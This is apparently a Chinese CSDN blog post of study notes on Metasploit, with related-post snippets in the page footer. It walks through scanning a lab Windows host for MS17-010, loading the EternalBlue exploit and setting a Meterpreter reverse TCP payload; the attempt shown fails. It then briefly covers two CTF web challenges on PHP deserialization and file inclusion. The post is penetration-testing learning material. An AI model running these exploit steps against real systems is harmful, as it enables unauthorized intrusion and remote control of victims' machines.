DAY3

最新推荐文章于 2024-04-19 22:44:39 发布
最新推荐文章于 2024-04-19 22:44:39 发布
阅读量482 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jasmine_H/article/details/108621422
版权

DAY3:

MSF

基本模块

  1. Auxiliary 辅助模块-为渗透测试信息搜集提供了大量的辅助模块支持;
  2. Exploits 攻击模块-利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,从而获得对远程目标系统访问权的代码组件;
  3. Payload 攻击载荷模块-攻击成功后促使靶机运行的一段植入代码;
  4. Post 后渗透攻击模块-收集更多信息或进一步访问被利用的目标系统;
  5. Encoders 编码模块-将攻击载荷进行编码,来绕过防护软件拦截。

基本运行

  1. 开启数据库:service postgresql start
    在这里插入图片描述

  2. 初始化msf数据库:msfdb.init

  3. 开启MSF:msfconsole
    在这里插入图片描述
    在这里插入图片描述

  4. 查看数据链接状态:db_status
    在这里插入图片描述图片可知:已选择postgresql,没有连接。

  5. 可直接输入help/?,查看帮助菜单

在这里插入图片描述
简单的帮助指令:
help/? 帮助菜单
exit 退出msf
Back 返回
info 显示一个或者多个模块的信息
show 显示所给类型的模块
background 将当前操作在后台运行
use 选择使用模块
sessions 查看会话

基本流程

  1. 扫描靶机
    use auxiliary/scanner/smb/smb_ms17_010

在这里插入图片描述输入后,可以输入info,查看模块信息。
info
在这里插入图片描述查看需要设置的选项:
show options
在这里插入图片描述
设置rhosts
set rhosts 192.168.221.129
在这里插入图片描述再进行扫描一下
exploit
在这里插入图片描述如果有一个小绿色[+],则发现它是一个可以被进攻的目标。它会显示window版本等。

由上图可知:
msf5辅助(scanner/smb/smb_ms17_010)>利用漏洞
192.168.221.129:445-已扫描1台主机(100%完成)
辅助模块执行完成。

辅助模块执行完成后,进入攻击模块。
所以先放回back.
在这里插入图片描述然后输入:
search type:exploit name:ms17
在这里插入图片描述先看 rank为yes的,选定第一个,
选定exploit/windows/smb/ms17_010_eternalblue,输入这个:
use exploit/windows/smb/ms17_010_eternalblue
在这里插入图片描述再进行info查看该模块信息,

在这里插入图片描述再查看需要设置的options,输入options,在输入set rhosts 192.168.221.129,类似于上个模块的操作。

然后,再收取会话。输入:show payloads
在这里插入图片描述由此可知,对方是windows7。

然后,设置会话,set payload windows/x64/meterpreter/reverse_tcp
,然后再options,是为了让payload设置监听
在这里插入图片描述在这里插入图片描述设置完成后,运行,run/exploit,得到会话。

在这里插入图片描述由上可知:
[-]处理程序无法绑定到192.168.221.135:4444:–
[]已在0.0.0.0:4444上启动反向TCP处理程序
[-]192.168.221.129:445-攻击因失败而中止:不易受攻击:将ForceExploit设置为override
[]攻击已完成,但未创建会话。

如果攻击成功,则会在末尾,发出“==== win ====”标志。

做题

  1. 题目:unserialize3
    在这里插入图片描述在这里插入图片描述

自己的思路:由题目可知,这是个有关于序列化的问题。
用到的知识点:反序列化、wakeup函数、code参数
解题步骤:
先增加一个对象的属性个数进行绕过;然后在编辑php输出序列化字符串,输出得出。
在这里插入图片描述
发现,有差别,
在这里插入图片描述payload后:
在这里插入图片描述得到flag:
在这里插入图片描述
2. 题目:Web_php_include
在这里插入图片描述题目中:文件include搜索字符串在另一个字符串中是否存在
用到strstr(),str_replace()以其它字符替换字符串中的一些字符
,data伪协议代码执行.

在这里插入图片描述输入到网页里,然后网页弹出在这里插入图片描述
在这里插入图片描述再输入进网页,然后,点击查看器。

吃不饱丶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[渗透测试笔记] 19.msf初步
H4ppyD0g的博客
05-05 534
msf利用浏览器漏洞渗透 这里利用IE6和漏洞ms10_018 原理:自己制作一个网上的资源,通过让目标主机访问这个资源,利用目标主机中浏览器的漏洞来共同导致被攻击的结果。 msfconsole启动msf search ms10_018查看相关漏洞 use exploit/windows/browser/ms10_018_ie_behaviors选择相应模块 set LHOST 192.168.2...
DAY 3
hxxtcl的博客
04-19 136
今日得分:20+100+39(终于在考场上A题了) T1 题目大意:给你一个长度为n的01字符串,定义(A*k)(k>=2)为S=A+A+…+A(k个A)的合法压缩,可压缩一个合法压缩串,两个合法压缩串连在一起也是一个合法压缩串。求给定01字符串的子集(与原串的与等于自身的串)的合法压缩方案之和对998244353取模的结果。n<=100。 题解:每次枚举最后一段压缩的串,记忆化搜索强制全压缩的串和不强制全压缩的串,dp即可。状态数可以证明不是很多(上界是O(n^3+2^(n/8)),但这
MSF漏洞利用完成但无法创建会话的几种原因
热门推荐
慢就是快
12-02 3万+
文章目录1.引言2.原因2.1漏洞payload和目标架构不匹配2.1.1 解决办法2.2 参数LHOST/SRVHOST 配置不当2.2.1 解决办法2.3 使用了NAT模式2.3.1 解决办法2.4存在杀软/EDR终端管理等2.4.1 解决办法2.5漏洞利用模块存在问题2.5.1 解决办法2.6目标已经修复漏洞打了补丁2.6.1 解决办法2.7 防火墙限制2.7.1 解决办法 1.引言 在实际攻防中经常用到一些漏洞模块去测试目标是否存在对应漏洞,比如下列模块: exploit/windows/smb/p
msf反弹shell成功,却无法建立会话处理办法
yang1234567898的博客
01-07 4924
报错:Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444). 如果run的时候出现以下问题导致建立会话失败,可能是端口4444被占用了, 在终端输入 “netstat -tulpen”,查看进程端口信息 通过命令”fuser -k 端口号/tcp“,删除4444端口进程 ...
20232925 2023-2024-2 《网络攻防实践》实践六次报告
最新发布
caoxincb的博客
04-19 976
总的来说这次实验难度不大。首先是学习了如何通过Metasploit利用漏洞攻击靶机,获取权限。然后对攻击流量的分析进一步加强了对漏洞利用的理解,合理利用工具然后提权获取权限留后门清理痕迹等。也提示了我们要时刻做好对系统的保护,及时修复漏洞,一些不必要的端口日常不要开启。
kali linux使用Metasploit进行会话管理
m0_74388365的博客
05-31 545
Metasploit是一个非常方便快捷的工具,可以通过简短的命令来快捷与对方的电脑进行会话建立与操控来达到自己想要的目的,看起来有点麻烦,但是熟悉流程之后却非常便利,还需要我们多多练习达到熟练掌握这门技术。
exploit已完成,但没有创建会话exploit completed, but no session was created
08-22 1万+
The "no session was created" message occurs if one of the following happens: 1) The exploit you use doesn't work against the target you selected. Could be the exploit is for a different ve...
笔试DAY3
qq_41520717的博客
03-06 266
字符串排序 题目描述: 月神拿到一个新的数据集,其中每个样本都是一个字符串(长度小于100),样本的的后六位是纯数字,月神需要将所有样本的后六位数字提出来,转换成数字,并排序输出。月神要实现这样一个很简单的功能确没有时间,作为好朋友的你,一定能解决月神的烦恼,对吧。 输入描述: 每个测试用例的第一行是一个正整数M(1<=M<=100),表示数据集的样本数目。接下来输入M行,每行是数据集...
RHCSA-DAY3
09-23
Red Hat Certificated System Administrator (RHCSA) of RHEL 7, this is lesson three.
1.26 C++ day3
01-26
1.26 C++ day3
day3.py
04-02
day3.py
Exploit:常用的一些Exploit,经常会更新,也欢迎各位提交新的exp给我
04-28
Exploit 常用的一些EXP,日常不定期更新,有新漏洞有EXP就会发出来。 未来 未来找机会写自己的漏洞利用框架,希望你们也能看到我写的漏洞利用框架 :)
day3_githubcourse
04-01
day3_githubcourse
数据结构 Day 3 主函数
06-12
main.c
数据结构 Day 3 预处理
06-12
head.h
day3笔记.html
03-02
day3笔记.html
【MSFconsole进阶】exploits(渗透攻击模块):Active Exploit(主动渗透攻击)、Passive Exploit(被动渗透攻击)
05-22 3664
【渗透工具】MSFconsole进阶:exploits(渗透攻击模块)
MS17-010移植到MSF中进行入侵
自学编程_youkewang.top
05-17 1万+
勒索病毒爆发后,这个0day相继被各种利用,现在正在走向灭亡,趁现在大部分内网用户还没有重视该漏洞,于是我想在前人的教程基础上,发一篇自己总结出来的教程,让更多的人可以少走一点弯路。   图1-1. 教程分2个Part,第一个讲移植ms17-010扫描脚本到msf中进行漏扫;第二个讲移植ms17-010的exploit到msf中进行攻击。 漏洞的介绍和原理我就不废话了,请自行百度。
[kali]--攻击浏览器漏洞
wwxxee
11-06 1375
攻击浏览器漏洞 Web浏览器时渲染和还原页面信息的应用程序,如果浏览器打开的页面含有触发漏洞的恶意代码,那么我们就有机会控制浏览器的下一步动作,执行payload。 Aurora攻击 2010年,Aurora攻击利用了一个存在于当时IE浏览器中尚未修复的0day漏洞。 环境: 实验的winxp靶机上有安装IE浏览器且没有安装Aurora的漏洞更新补丁。 kali:192.168.17.129 winxp:192.168.17.130 1.设置模块 我们利用meatasploit的Aurora模块
黑马瑞吉优化Day3
09-24
黑马瑞吉优化Day3是指在数据库中使用一个元数据处理器来填充公共字段,以及创建一个线程局部变量工具类来设置和获取当前用户ID,从而实现验证用户是否登录的功能。元数据处理器是一个类,通过实现MyBatis Plus框架中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值